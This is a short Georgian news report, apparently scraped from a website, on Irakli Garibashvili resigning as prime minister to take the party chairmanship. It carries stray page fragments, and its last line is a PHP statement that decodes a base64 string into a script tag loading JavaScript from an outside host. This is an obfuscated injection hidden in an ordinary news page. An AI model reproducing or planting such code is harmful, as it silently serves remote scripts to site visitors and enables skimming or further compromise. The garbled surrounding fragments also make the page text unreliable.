celsiusi
ავერსი შნაიდერი

ირაკლი ღარიბაშვილმა პრემიერის პოსტი დატოვა, -ამის შესახებ მან მთავრობის ადმინისტრაციაში გამართულ ბრიფინგზე ისაუბრა.

"პოლიტიკური რეალობიდან გამომდინარე პოლიტსაბჭოსგან მივიღე შეთავაზება დავიკავო პარტიის თავმჯდომარის თანამდებობა. ამასთან დაკავშირებით ყრილობა გაიმართება 1-ელ თებერვალს. არ დაგიმალავთ, პარტიისგან მივიღე შეთავაზება, რომ თანამდებობაზე ზაფხულში საარჩევნო კამპანიის დაწყებამდე დავრჩენილიყავი, მაგრამ ვარჩიე ახლა მიმეღო ეს გადაწყვეტილება", - განაცხადა ღარიბაშვილმა.

მისივე თქმით, ახლა მნიშვნელოვანია შემდეგმა პრემიერმა დროულად წარადგინოს გუნდი და ჩამოაყალიბოს მთავრობა. უკვე ყოფილმა პრემიერმა, მომავალ პრემიერს წარმატება უსურვა.

ღარიბაშვილმა პრემიერ-მინისტრის პოსტის დატოვების შესახებ დღეს განაცხადა.

189
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");